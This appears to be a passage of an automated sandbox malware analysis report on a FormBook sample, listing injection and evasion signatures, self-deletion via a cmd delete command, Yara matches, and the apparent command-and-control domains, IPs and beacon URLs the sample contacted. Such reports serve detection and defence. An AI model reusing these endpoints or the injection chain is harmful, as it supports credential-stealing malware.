Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov ecx, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669080 mov eax, dword ptr fs:[00000030h] 13_2_03669080
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h] 13_2_036E3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h] 13_2_036E3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367849B mov eax, dword ptr fs:[00000030h] 13_2_0367849B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00409B20 LdrLoadDll, 2_2_00409B20
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.valorplanodesaudemaranhao.info
Source: C:\Windows\explorer.exe Network Connect: 172.67.196.84 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.everybankatm.com
Source: C:\Windows\explorer.exe Domain query: www.nordiqueluxury.com
Source: C:\Windows\explorer.exe Domain query: www.quickskiplondon.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.singularity.institute
Source: C:\Windows\explorer.exe Domain query: www.parakhonskiy.com
Source: C:\Windows\explorer.exe Domain query: www.lifewithbriana.com
Source: C:\Windows\explorer.exe Network Connect: 35.237.65.63 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 84.34.147.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.municipiodeanton.net
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: B40000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Memory written: C:\Users\user\Desktop\scan files 15-9-21.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3292 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe' Jump to behavior
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000000.270333689.0000000005F40000.00000004.00000001.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.358263429.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Users\user\Desktop\scan files 15-9-21.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483582 Sample: scan files 15-9-21.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 31 www.getcenteredwithclay.com 2->31 33 www.actonetheatre.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 9 other signatures 2->47 11 scan files 15-9-21.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\scan files 15-9-21.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 scan files 15-9-21.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.nordiqueluxury.com 84.34.147.60, 49776, 80 TSF-IP-CORETeliaFinlandOyjEU Finland 18->35 37 www.singularity.institute 172.67.196.84, 49784, 80 CLOUDFLARENETUS United States 18->37 39 8 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.196.84
 www.singularity.institute United States
13335 CLOUDFLARENETUS true
35.237.65.63
 www.municipiodeanton.net United States
15169 GOOGLEUS false
34.98.99.30
 quickskiplondon.com United States
15169 GOOGLEUS false
84.34.147.60
 www.nordiqueluxury.com Finland
1759 TSF-IP-CORETeliaFinlandOyjEU true

Contacted Domains

Name IP Active
www.getcenteredwithclay.com 99.83.154.118 true
www.nordiqueluxury.com 84.34.147.60 true
quickskiplondon.com 34.98.99.30 true
valorplanodesaudemaranhao.info 34.98.99.30 true
www.singularity.institute 172.67.196.84 true
www.municipiodeanton.net 35.237.65.63 true
www.valorplanodesaudemaranhao.info unknown unknown
www.everybankatm.com unknown unknown
www.parakhonskiy.com unknown unknown
www.lifewithbriana.com unknown unknown
www.actonetheatre.com unknown unknown
www.quickskiplondon.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.municipiodeanton.net/mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN false
  • Avira URL Cloud: safe
 unknown
http://www.quickskiplondon.com/mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN false
  • Avira URL Cloud: safe
 unknown
http://www.nordiqueluxury.com/mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN true
  • Avira URL Cloud: safe
 unknown
http://www.singularity.institute/mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN true
  • Avira URL Cloud: safe
 unknown
www.lifewithbriana.com/mej0/ true
  • Avira URL Cloud: safe
 low
http://www.valorplanodesaudemaranhao.info/mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN false
  • Avira URL Cloud: safe
 unknown